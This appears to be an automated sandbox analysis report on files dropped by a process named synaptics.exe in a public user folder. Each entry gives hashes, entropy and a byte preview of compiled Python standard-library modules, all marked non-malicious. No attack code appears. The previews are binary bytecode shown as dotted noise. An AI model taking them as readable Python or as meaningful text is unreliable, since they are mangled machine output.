                                                                                                                                                                                      Preview:o........'-d.........................@...s6...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...z.d.d.l.m.Z...W.n...e.y=......d.d.l.m.Z...Y.n.w.g.d...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.z.e.j.Z.d.Z.e...d.....W.n...e ye......d.Z.Y.n.w.e.j!Z"z.e.j#Z$W.n...e yy......d.Z$Y.n.w.e.j%Z%[.d.a&d.a'd.d...Z(d.d...Z)d.d...Z*d.d...Z+e.Z,d.d...Z#G.d.d...d...Z-e-Z.G.d.d...d...Z/G.d.d...d...Z0G.d.d...d.e0..Z1G.d.d...d...Z2G.d.d ..d ..Z3G.d!d"..d"e4..Z5e.d#..j6Z7d$d%..Z8e#..a9i.Z:i.Z;e...Z<e...a=e>..a?d&d'..Z@G.d(d)..d)..ZAz.d.d*l.mBaCmDZE..W.n#..e...y.......d.d+lFmGZH..d.d,l.mIZI..eId-d...ZDd/d-..ZEd0d1..aCY.n.w.tCZJd2d3..ZKG.d4d5..d5eA..ZLG.d6d7..d7eA..ZMG.d8d9..d9eA..ZNd:d;..ZOd<d=..ZPd>d?..ZQd@dA..ZRdBdC..ZSdDdE..ZTg.ZUd.aVdFdG..ZWd.dHl.mXZX..eM..aYdIdJ..ZZdKdL..Z[z.d.dMl.m\Z]..W.n...e...y.......d.dNl^m]Z]..Y.n.w.dOdP..Z_e`e.dQ....r.e.jae_dR....d.S.d.S.)Sz;Thread module emulating a subset of Java's threading model......N)...monotonic)...WeakSet)...islice..count)...deque)...get_ident
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2751
                                                                                                                                                                                      Entropy (8bit):5.778755577479554
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:6HWS58lFEOqIlPBJR41EYBzH3ch9C7Q7WnvKQvVgkGQLU:6HWSOFEOb5nFYBb3ch9T6qKLU
                                                                                                                                                                                      MD5:8A942A29802294F36291286B1551C570
                                                                                                                                                                                      SHA1:F939C32A0DDC8DCEB7626BD1503E37049DE40D54
                                                                                                                                                                                      SHA-256:2761365AB75BC37B835ED32F18750AA2790668006B55E0A0143AE4A030D1C396
                                                                                                                                                                                      SHA-512:8C837729FB064DB8885F9B7D71E4D882DD3B0978B82B9AA4FC1C0AB54387F5EB9C0FC998001352FF5E334E4CBCAA0063C1E9995229859A7BBD368386BDAD2054
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sF...d.Z.g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z d!Z!d"Z"d#Z#d$Z$d%Z%d&Z&d'Z'd(Z(d)Z)d*Z*d+Z+d,Z,d-Z-d.Z.d/Z/d0Z0d1Z1d2Z2d3Z3d4Z4d5Z5d6Z6d7Z7d8Z8d9Z9d:Z:d;Z;d<Z<d=Z=d>Z>d?Z?d@Z@dAZAdBZBdCZCdDdE..eD...E..D...ZFe..GeF.H......i.dFe...dGe...dHe*..dIe...dJe+..dKe...dLe...dMe...dNe%..dOe0..dPe(..dQe...dRe&..dSe...dTe...dUe'..dVe5..i.dWe...dXe6..dYe...dZe1..d[e2..d\e)..d]e...d^e7..d_e...d`e...dae#..dbe...dce...dde...dee...dfe...dge ....e$e/e3e4e.e.e"e-e.e.e,e.e!dh....ZIdidj..ZJdkdl..ZKdmdn..ZLdoS.)pz.Token constants.)...tok_name..ISTERMINAL..ISNONTERMINAL..ISEOF................................................................................................................................................................. ....!...."....#....$....%....&....'....(....)....*....+....,....-........./....0....1....2....3....4....5....6....7....8....9....:....;....<....
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):17207
                                                                                                                                                                                      Entropy (8bit):5.78025405754347
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:pSAswui0pcPm6mE93/w3CNgM/0n/JM7XHVOBnaH:pmiLPm3E93/wyNgM/EElOBnaH
                                                                                                                                                                                      MD5:2F81B5A7DF51D2D496920A8E8FA0B26F
                                                                                                                                                                                      SHA1:C9B6DB93E64F5BE3C05409C4865D79FF8ECD6A19
                                                                                                                                                                                      SHA-256:25E9BC3CAC1257B8CDC48A148E6B769F23931D19A86FA359508013D7ED9986E5
                                                                                                                                                                                      SHA-512:39219EF766E0D8C960B703FF0331D5922BAD94B54C2B25145FC272E0493EEFF5F459E160430FAC90A8CF0715E36EAB1CB33F44358354DC1A5810B03AE03E9AB3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.g.......................@...sT...d.Z.d.Z.d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z...e...d.e.j...Z.e...d.e.j...Z.d.d.l.Z.e.j.g.d.....Z.[.G.d.d...d.e...d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.e.e.d.e.......e.e.....Z.d.Z d.Z!d.Z"d.Z#d.Z$e.e!e"e#e$..Z%d.Z&e.d.d ..e.e&....Z'd!e&..Z(e.e'e(..Z)e.d"e)d#....Z*e.e*e)e%..Z+d$d%..Z,e.j-d&d'....Z.e.e,....Z/d(Z0d)Z1d*Z2d+Z3e.e/d,..e/d-....Z4e.e/d...e/d/....Z5e.e6e.j7e8e.d0d1......Z9e.d2e9..Z:e.e+e:e5e ..Z;e.e;..Z<e.e/d3..e.d4d.....e/d5..e.d6d.......Z=e.d7e.e4..Z>e.e.e>e+e:e=e ....Z?i.Z@e,..D.].ZAe0e@eAd4..<.e1e@eAd6..<.e2e@eAd,..<.e3e@eAd-..<...q.eB..ZCeB..ZDe,..D.]%ZEeEd6..eEd4..f.D.].ZFeC.GeF......qIeEd-..eEd,..f.D.].ZFeD.GeF......qZ..q?d8ZHG.d9d:..d:eI..ZJG.d;d<..d<eI..ZKG.d=d>..d>..ZLd?d@..ZMdAdB..ZNdCdD..ZOdEdF..Z.dGdH..ZPdIdJ..ZQdKdL..ZRdMdN..ZSeTdOk...r.eS....d.S.d.S.)Pao...Tokenization help for Python programs...tokenize(readline) is a generator that breaks a stream
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):21721
                                                                                                                                                                                      Entropy (8bit):5.2962014434950175
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:IoooGsSgHvgJJpLbiO+pSbnwRG+SbL3JWFsFmppQigBsKU9l4UiTdBq:IooncHvIJpiJAngzSBhU9l4UiTdBq
                                                                                                                                                                                      MD5:BB16E21B872D39504B7A173B439C750D
                                                                                                                                                                                      SHA1:753011F314235186293400EB9BA8B09CCA11B8D9
                                                                                                                                                                                      SHA-256:EAC5FB0155054EB640618EC90127C5B6BD10E8A36C05D39F9AA6CF6B73CE301F
                                                                                                                                                                                      SHA-512:65224BD422A1C152FD5590E936E8F4B183EDF7EB9F5AE455F4953E544F113DAB140FB4EDEA88480BF9FBE5F50010A85693682A9A9F47572D94EEB6403B45874D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.i.......................@...sJ...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d8d.d...Z.d.d...Z.d9d.d...Z.d8d.d...Z.d8d.d...Z.d.Z.d.Z.G.d.d...d...Z.e...Z.d.d...Z.e.e.d.d.d.f.d.d...Z.e.e.d.d.f.d.d...Z.e.f.d.d...Z.d.d...Z.d.d...Z.d:d.d ..Z.d;d!d"..Z.d:d#d$..Z.d<d%d&..Z.d9d'd(..Z.d9d)d*..Z.d+d,..Z.G.d-d...d...Z.d/d0..Z.d1d2..Z.d3Z.G.d4d5..d5e ..Z!G.d6d7..d7..Z"d.S.)=z@Extract, format and print information about Python stack traces......N)...extract_stack..extract_tb..format_exception..format_exception_only..format_list..format_stack..format_tb..print_exc..format_exc..print_exception..print_last..print_stack..print_tb..clear_frames..FrameSummary..StackSummary..TracebackException..walk_stack..walk_tbc....................C...s4...|.d.u.r.t.j.}.t...|.......D.].}.t.|.|.d.d.....q.d.S.).zyPrint the list of tuples as returned by extract_tb() or. extract_stack() as a formatted stack trace to the given file.N......file..end)...sys..stderrr......from_list..format..print)...extracted_l
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9538
                                                                                                                                                                                      Entropy (8bit):5.148392423531561
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:W8BGSXkI304JX7ad5RV7VIPNmXkXFNlO8U2UuLWnxq3juXvypQ1SwDFBL0GSSSO9:jBGgf9oV4NmAFyvWLwx8pOXU/I+rjmV
                                                                                                                                                                                      MD5:7C792029776160273C123FABC37270B2
                                                                                                                                                                                      SHA1:62953166BEB72D5F306E02EE3DFFBB777054E35B
                                                                                                                                                                                      SHA-256:32C278122BB2D0444FA29A1A65420931042B7F74746E08921C37E36BEE2C2C68
                                                                                                                                                                                      SHA-512:5FC5473C024E8D44498C24089C4993B5CDE066F18CC2B9730DA7BFE457D63930DAB609DB98ECE78CF016F505FDD05B55B152155B3A3EF19EDD76D0165A37C82C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.(.......................@...s....d.Z.d.d.l.Z.d.d...Z.e.e...Z.e.d.d.....Z.e.e.j...Z.e.e.j...Z.e.e.j...Z.d.d...Z.e.e.....Z.d.d...Z.e.e.....Z.d.d...Z.e...Z.e.e...Z.e.......d.d...Z.e...Z.e.e...Z.G.d.d...d...Z.e.e...j...Z.e.e...Z.e.g.j...Z.e.e.j...Z.e.e...j...Z e.e!j"..Z#e.e$j.d.....Z%e.e...Z&z.e'....e'y.......e..(..d...Z)e.e)..Z*e.e)j+..Z,d.Z)[)Y.n.w.e.e.j...Z-e.e.j...Z/[.[.[.[.[.[.d$d.d...Z0d.d...Z1d%d.d...Z2d.d...Z3G.d.d...d...Z4G.d.d...d...Z5d d!..Z6e.e7e8....Z9e.e8e!B...Z:e.e;..Z<e.d...Z=e.e>..Z?d"d#..e@..D...ZAd.S.)&zO.Define names for built-in types that aren't directly accessible as a builtin.......Nc....................C........d.S...N..r....r....r.....)C:\Users\Public\QExvbmVOb25l\lib\types.py.._f...........r....c....................C...r....r....r....r....r....r....r......<lambda>....r....r....c........................s....d.....f.d.d...}.|.j.d...S.).N.....c........................r....r....r....r........ar....r......f....r....z._cell_factory.<locals>.fr....)...__clo
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):85290
                                                                                                                                                                                      Entropy (8bit):5.274882798428899
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:XCKtWnXfBkzWWZGNt2akuICUSA3yZSIKug/kzVWqn1poHezYRXH1UXWbAyitL5U+:SSoWu54ug8fAHecVD8Vo+
                                                                                                                                                                                      MD5:692B81AADB3B595AB367EC459BEB25D1
                                                                                                                                                                                      SHA1:3104B0883078C1D095C69152D7AE35C1568B97C4
                                                                                                                                                                                      SHA-256:5EE17AE8C86C4F07660FD0F0374045D3058D4874BFF7066B76AFA4562B2E61CB
                                                                                                                                                                                      SHA-512:A1D9ABAE52471A98C7E2D9C04B1AB1E7121B1267EAC908DB51774A242775258B43A22ACA67A7595CCEDD9B90F0DD59F247F11C1AD5617B60D691D12B2FD57A3B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.t.......................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...g.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.g.Z.d.d.d...d.d...Z.e...f.d d!..Z.G.d"d#..d#..Z G.d$d%..d%..Z!G.d&d'..d'e d.d(..Z"G.d)d*..d*e"d.d(..Z#e"d+d,....Z$e"d-d.....Z%e"d/d0....Z&e"d1d2....Z'e"d3d4....Z(e"d5d6....Z)e#e.d.d...d7d8......Z*e"d9d:....Z+e"d;d<....Z,e"d=d>....Z-G.d?d@..d@e d.d(..Z.G.dAdB..dB..Z/G.dCdD..dDe e!e/d.d(..Z0G.dEdF..dFe e!d.d(..Z1G.dGdH..dHe e!d.d(..Z2G.dIdJ..dJe e!e/d.d(..Z3dKdL..Z4G.dMdN..dNe d.d(..Z5G.dOdP..dPe5d.d(..Z6G.dQdR..dRe5d.d(..Z7G.dSdT..dTe6d.d(..Z8G.dUdV..dVe7d.d(..Z9G.dWdX..dXe7d.d(..Z:G.dYdZ..dZe6d.d(..Z;d[d\..Z<G.d]d^..d^e6d.d(..Z=G.d_d`..d`e6d.d(..Z>G.dadb..db..Z?G.dcdd..dd..Z@G.dedf..df..ZAg.dg..ZBg.dh..ZCeBeC..dig...ZDdjdk..ZEdldm..ZFdndo..ZGd.drds..ZHd.dudv..ZIg.dw..dxdyg.dz..ZJG.d{d|..d|e...ZKG.d}d~..d~e?eKd...ZLG.d.d...d.e6d.d(
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3701
                                                                                                                                                                                      Entropy (8bit):5.565725181926225
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:G6dByWyhU9ShozDLcLmxESqc0Ic5k4CW76a0:G6dByWS2zECW3u4gD
                                                                                                                                                                                      MD5:D9D2E0A72ECC569C9550A4BF51997CD2
                                                                                                                                                                                      SHA1:7AF75A4FE79F87F1380771250BA38901D6D556F4
                                                                                                                                                                                      SHA-256:8F347DFD01F602CD58AE6D37FB436B9FBACE215AD164A74E9B35D0F1697DDFDC
                                                                                                                                                                                      SHA-512:5861BA952C937EB7B0E67E0A008F31C5B29597A23E87BDA056B3CFF7C6B816A376F0F0B3BC267A1A702FF8B3379C33081E2637667207B0AC857147E3D3C9BF88
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sl...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.G.d.d...d.e...Z.d.d.d...d.d...Z.d.d.d...Z.d.d...Z.e.d.k.r4e.....d.S.d.S.).z.Implementation of the UUencode and UUdecode functions...encode(in_file, out_file [,name, mode], *, backtick=False).decode(in_file [, out_file, mode, quiet])......N)...Error..encode..decodec....................@...s....e.Z.d.Z.d.S.).r....N)...__name__..__module__..__qualname__..r....r.....&C:\Users\Public\QExvbmVOb25l\lib\uu.pyr....'...s........r....F....backtickc....................C...sx...g.}.z.|.d.k.r.t.j.j.}.n/t.|.t...r;|.d.u.r.t.j...|...}.|.d.u.r1z.t...|...j.}.W.n...t.y0......Y.n.w.t.|.d...}.|...|.....|.d.k.rDt.j.j.}.n.t.|.t...rSt.|.d...}.|...|.....|.d.u.rYd.}.|.d.u.r_d.}.|...d.d...}.|...d.d...}.|...d.|.d.@.|.f.....d.......|...d...}.t.|...d.k.r.|...t.j.|.|.d.......|...d...}.t.|...d.k.s.|.r.|...d.....n.|...d.....W.|.D.].}.|.......q.d.S.|.D.].}.|.......q.w.).z.Uuencode file..-N..rb..wbi.......z.\n...z.\rz.begin %o %s.i......asc
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13659
                                                                                                                                                                                      Entropy (8bit):5.378568919816206
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:QBo+bnHagj6xo0+t6p6l0y8pym5hlSxbFBdbvywKVv3dxZuC1J:QVrHagj6xLM6GaEbFBdryJ/dxZuC1J
                                                                                                                                                                                      MD5:A34819C409015D3ED5D66DE2E2BD95A6
                                                                                                                                                                                      SHA1:A7F811C5C94C99AF43123E230A1C0DE379CDD5AF
                                                                                                                                                                                      SHA-256:178704D6443933120EECC6885E48D9DEF9154F8F9C31C9FA2017F0EF051F0A7D
                                                                                                                                                                                      SHA-512:B133F04B12F29FE37C8534D4DC7F2F3AE8AB2CBE188868EEE956B0011E176742B9A8833265908CBCBAF0507139E5BAD909C56496AB8B983FFE7411BA5F7513F6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.O.......................@...s....d.Z.d.d.l.Z.g.d...Z.d=d.d...Z.d>d.d...Z.d.d...Z.d.d...Z.e.Z.d.d...Z.e.Z.d.d...Z.d.e.d.d.d.f.d.d...Z.e.d.d.f.d.d...Z.d.d...Z.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d?d)d*..Z.....d@d+d,..Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.d1d2..Z.z.d.d3l.m.Z.m Z m!Z!m.Z.m.Z.m"Z"..e Z#e!Z$d4Z%W.n...e&y.......g.Z.d5Z#i.Z$d(a'd6d7..Z"d.Z%Y.n.w.e.e.j(....e%s.e)e.d8..s.e.d5e*d9d(d:....e.d;e*d(d<....e.d;e+d(d<....e.d;e,d(d<....e.d;e-d(d<....[%d.S.)Az&Python part of the warnings subsystem......N)...warn..warn_explicit..showwarning..formatwarning..filterwarnings..simplefilter..resetwarnings..catch_warningsc....................C...s....t.|.|.|.|.|.|...}.t.|.....d.S.)..7Hook to write a warning to a file; replace if you like.N)...WarningMessage.._showwarnmsg_impl)...message..category..filename..lineno..file..line..msg..r.....,C:\Users\Public\QExvbmVOb25l\lib\warnings.pyr........s........r....c....................C...s....t.|.|.|.|.d.|...}
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20356
                                                                                                                                                                                      Entropy (8bit):5.0836801324013985
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:QjNLqhczEtRkD2ofjXd7AMlM/DgWryRjKj8j/XBNOjEUWYh1xL0D:QpqhWSRkSUXd7xyDDyDjOjbWISD
                                                                                                                                                                                      MD5:83CD9BE8C2B5762933901E53612EB51D
                                                                                                                                                                                      SHA1:922328F291795BD31A1243EE1BEC8E36EF10F6B7
                                                                                                                                                                                      SHA-256:847B027F6A5E86A80A78ADFC1ACC9DE48EC4564C34EB9A5BFBA052EA78ADF6ED
                                                                                                                                                                                      SHA-512:F579616543BD18C6F81DCA9919BEAE90D661EEF5539B3AB1403386C2565759D9B4D53EF42EF9ABBA4550FD44391DDA9E56A5D21052F67DFA7052661B3EE5B06E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.V.......................@...s....d.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.e.e.f.Z.g.d...Z.e.j...e.....e.j...e.....G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d...Z.d.S.).z|Weak reference support for Python...This module is an implementation of PEP 205:..https://www.python.org/dev/peps/pep-0205/......)...getweakrefcount..getweakrefs..ref..proxy..CallableProxyType..ProxyType..ReferenceType.._remove_dead_weakref)...WeakSet.._IterationGuardN).r....r....r....r......WeakKeyDictionaryr....r....r......ProxyTypes..WeakValueDictionaryr......WeakMethod..finalizec........................sD...e.Z.d.Z.d.Z.d.Z.d.d.d...Z...f.d.d...Z.d.d...Z.d.d...Z.e.j.Z.....Z.S.).r....z.. A custom `weakref.ref` subclass which simulates a weak reference to. a bound method, working around the lifetime problem of bound methods.. )..._func_ref.._meth_type.._alive..__weakref__Nc........................sx...z.|.j.}.|.j.}.W.n...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):61048
                                                                                                                                                                                      Entropy (8bit):5.52755356940606
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:e5DKf6qzuikPr038uc4PT1+Y9sW1EynK5c7z0p+YHiBZ:InqyPr0dhXFAp76
                                                                                                                                                                                      MD5:8106753A39CABCBA5AEB40F563BF7E62
                                                                                                                                                                                      SHA1:BC0FE47B046D553245AD950010D540DBD7F6DC34
                                                                                                                                                                                      SHA-256:20817AEC1F4BCF7AA6F0DA4E97238077B460D76379535284709D3359CF756174
                                                                                                                                                                                      SHA-512:AE4B6533052B8FB784484B5C580725F269F3EEF59BB54AA0032EF5360371DC0286183FD85ADC73603E4851FA00C7FA469D52C5091B0BA2370A99A3F8116B30A4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.g.......................@...sD...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.e.j.Z.W.n...e.yQ......d.Z.e.j.Z.Y.n.w.z.d.d.l.Z.W.n...e.yc......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.yu......d.Z.Y.n.w.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e...Z.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d.Z#d.Z$d.Z%d.Z&d.Z'd.Z(e..)e'..Z*d.Z+d.Z,d.Z-d.Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5d.Z6e..)e5..Z7d.Z8d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDd.ZEd.ZFd ZGd!ZHd"ZId#ZJd$ZKd%ZLe..)eK..ZMd.ZNd.ZOd.ZPd.ZQd.ZRd.ZSd.ZTd.ZUd.ZVd.ZWd.ZXd.ZYd&ZZd'Z[e..)eZ..Z\d(Z]d)Z^e..)e]..Z_d.Z`d.Zad.Zbd.Zcd.Zdd.Zed.Zfd.Zgd.Zhd.Zid*Zje..kd+..Zld,d-..Zmd.d/..Znd0d1..Zod2d3..Zpd4d5..ZqG.d6d7..d7er..Zsd.atd8d9..Zud:d;..ZvG.d<d=..d=..ZwG.d>d?..d?..Zxi.d.d@..d.dA..d.dB..d.dB..d.dB..d.dB..d.dC..d.dD..d.dE..d.dF..d.dC..d.dG..d.dH..d#dI..dJdK..dLdM..dNdO..ZydPdQ..ZzdsdRdS..Z{dTdU..Z|G.dVdW..dW..Z}G.dXdY..dY..Z~G.dZd[..d[e.j...Z.G.d\d]..d]e.j...Z.G.d^d_..d_..Z.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):48466
                                                                                                                                                                                      Entropy (8bit):5.122325300143825
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:1bRUurnFDpytMbeGzDRBPou+eQyWImBfbGm49WxxSNo4Q+M2PvUPPAeOTMtJcCnM:RRtFDpyTGzDRBPoJImBfbGm49WxENbQ8
                                                                                                                                                                                      MD5:D534A846CC1CFBD5889D485066EA9B1F
                                                                                                                                                                                      SHA1:58DF6A8E86CB20F93FEB5B6E12D13CDF0C1A9530
                                                                                                                                                                                      SHA-256:F8DA37FD833C794A450A9356AFB9DA4C34089BA30EB2E4845DC1B58C6264D3CD
                                                                                                                                                                                      SHA-512:039FAAD32CE4CF831DFD6F5AC57D2EC04DEE708A3411CF92B8727E44425A9E61241C5B776DB61A6084314E8AB6B27817738C1CC9AF6D7B58683DD3E2C4C74D14
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.yO......Y.n.w.e.j...e.....z.d.d.l.m.Z...W.n...e.yg......Y.n.w.G.d.d...d.e.j ..Z!G.d.d...d.e.j"..Z#G.d.d...d.e.j$..Z%G.d.d...d.e&..Z'G.d.d...d.e(..Z)z.d.d.l.m)Z)..W.n...e.y.......Y.n.w.z.d.d.l.m*Z*..W.n...e.y.......d.d...Z*Y.n.w.d.d.d.d...d.d...Z+d d!..Z,z.d.d"l.m,Z,..W.n...e.y.......Y.n.w.G.d#d$..d$e(..Z-G.d%d&..d&e.j...Z/G.d'd(..d(e.j...Z0G.d)d*..d*e.j...Z1G.d+d,..d,e.j2..Z3d.S.)-a?...This module implements specialized container datatypes providing.alternatives to Python's general purpose built-in containers, dict,.list, set, and tuple...* namedtuple factory function for creating tuple subclasses with named fields.* deque list-like container with fast appends and pops on either end.* ChainMap dict-like class for creating a single view of multiple mappings.* Counter dict subclass
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):251
                                                                                                                                                                                      Entropy (8bit):4.825708846798739
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:y/jcteC5VvkFZlaE+MdF/Hj5J+soZAuaHxEMntGdgIun:CoeC7gj+Er+so+VltGdcn
                                                                                                                                                                                      MD5:ED7096D7B9E7FB6E5392AD893D8540B4
                                                                                                                                                                                      SHA1:63904A501EC62F5DC818C137906566C23FC0B503
                                                                                                                                                                                      SHA-256:F4347E75E46BF3EEAD0EE408D916F5DD9BFACACD003CBCA478D188A6B3F576BF
                                                                                                                                                                                      SHA-512:E155D58B184B06861688A460FC67FCD3FD8E07E3251A2175A72A80B77E85D305CC792900B2F41880064198FFF96323589772E4762C45ED1B761D4CEB1EF45197
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dz........................@...s$...d.d.l.T.d.d.l.m.Z...d.d.l.m.Z...d.S.)......)...*)...__all__)..._CallableGeneriuserasN)..._collections_abcr....r......r....r.....3C:\Users\Public\QExvbmVOb25l\lib\collections\abc.py..<module>....s..........
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15895
                                                                                                                                                                                      Entropy (8bit):5.335194926314186
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:QoMRQLVaCuoN1r9u1u2RTCQzweSkqxo5IbeX6EoV:QoMoVh9u1d9wqpIbQBoV
                                                                                                                                                                                      MD5:93FF873A646B4442F31F836CBAF8035A
                                                                                                                                                                                      SHA1:439C0B30D378DF9A3D8908950582D010F062770D
                                                                                                                                                                                      SHA-256:E805E9E422A7CFA8180B21F4D6E9755C510C8C0F78D9D7DD3F682A600BDD9B30
                                                                                                                                                                                      SHA-512:1A5AC9BF432D6F03CE6DC80758C841A02CBA8748CEEF78951BCC9216FCC77544B50B062B3B619E27E297874FF197743144027C68EC0364752053F9285B0AF2A3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
